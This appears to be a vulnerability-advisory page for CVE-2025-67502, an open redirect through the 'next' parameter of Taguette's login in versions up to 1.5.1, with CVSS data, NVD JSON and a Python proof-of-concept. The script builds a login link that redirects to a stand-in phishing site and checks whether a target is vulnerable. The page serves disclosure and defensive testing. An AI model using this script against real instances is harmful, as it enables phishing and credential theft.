Security Vulnerability Report
中文
CVE-2025-67502 CVSS 5.4 MEDIUM

CVE-2025-67502

Published: 2025-12-10 00:16:12
Last Modified: 2025-12-16 15:11:43
Source: [email protected]

Description

Taguette is an open source qualitative research tool. In versions 1.5.1 and below, attackers can craft malicious URLs that redirect users to arbitrary external websites after authentication. The application accepts a user-controlled next parameter and uses it directly in HTTP redirects without any validation. This can be exploited for phishing attacks where victims believe they are interacting with a trusted Taguette instance but are redirected to a malicious site designed to steal credentials or deliver malware. This issue is fixed in version 1.5.2.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:taguette:taguette:*:*:*:*:*:*:*:* - VULNERABLE
Taguette <= 1.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import urllib.parse # CVE-2025-67502 Open Redirect PoC for Taguette # Target: Taguette <= 1.5.1 def generate_open_redirect_url(target_url, redirect_target): """ Generate an open redirect URL exploiting the 'next' parameter Args: target_url: Base URL of the vulnerable Taguette instance redirect_target: Malicious website to redirect to Returns: Malicious URL string """ encoded_target = urllib.parse.quote(redirect_target, safe='') malicious_url = f"{target_url}/login?next={encoded_target}" return malicious_url def test_open_redirect(target_url, redirect_target): """ Test if the target is vulnerable to open redirect Args: target_url: Base URL of the Taguette instance redirect_target: Target URL for redirection test Returns: Boolean indicating if vulnerable """ malicious_url = generate_open_redirect_url(target_url, redirect_target) try: response = requests.get( malicious_url, allow_redirects=False, timeout=10 ) # Check if the response contains a redirect to the target if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') if redirect_target in location or redirect_target in urllib.parse.unquote(location): print(f"[+] VULNERABLE: Redirects to {location}") return True # Also check meta refresh and JavaScript redirects if 'window.location' in response.text or 'meta http-equiv' in response.text.lower(): print("[+] Potential redirect found in response body") return True except requests.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": # Configuration target = "https://vulnerable-taguette.example.com" phishing_site = "https://evil-phishing-site.com/fake-login" print("=" * 60) print("CVE-2025-67502 Open Redirect PoC") print("Target: Taguette <= 1.5.1") print("=" * 60) malicious_url = generate_open_redirect_url(target, phishing_site) print(f"\n[>] Malicious URL:\n{malicious_url}\n") # Uncomment to test against actual target # is_vulnerable = test_open_redirect(target, phishing_site) # print(f"\n[>] Vulnerability Status: {'VULNERABLE' if is_vulnerable else 'NOT VULNERABLE'}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67502", "sourceIdentifier": "[email protected]", "published": "2025-12-10T00:16:11.600", "lastModified": "2025-12-16T15:11:43.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Taguette is an open source qualitative research tool. In versions 1.5.1 and below, attackers can craft malicious URLs that redirect users to arbitrary external websites after authentication. The application accepts a user-controlled next parameter and uses it directly in HTTP redirects without any validation. This can be exploited for phishing attacks where victims believe they are interacting with a trusted Taguette instance but are redirected to a malicious site designed to steal credentials or deliver malware. This issue is fixed in version 1.5.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:taguette:taguette:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.2", "matchCriteriaId": "39254E2C-C17C-46A8-AF9E-1516E0817994"}]}]}], "references": [{"url": "https://github.com/remram44/taguette/commit/67de2d2612e7e2572c61cd9627f89c2bfd0f2a36", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/remram44/taguette/security/advisories/GHSA-5923-r76v-mprm", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.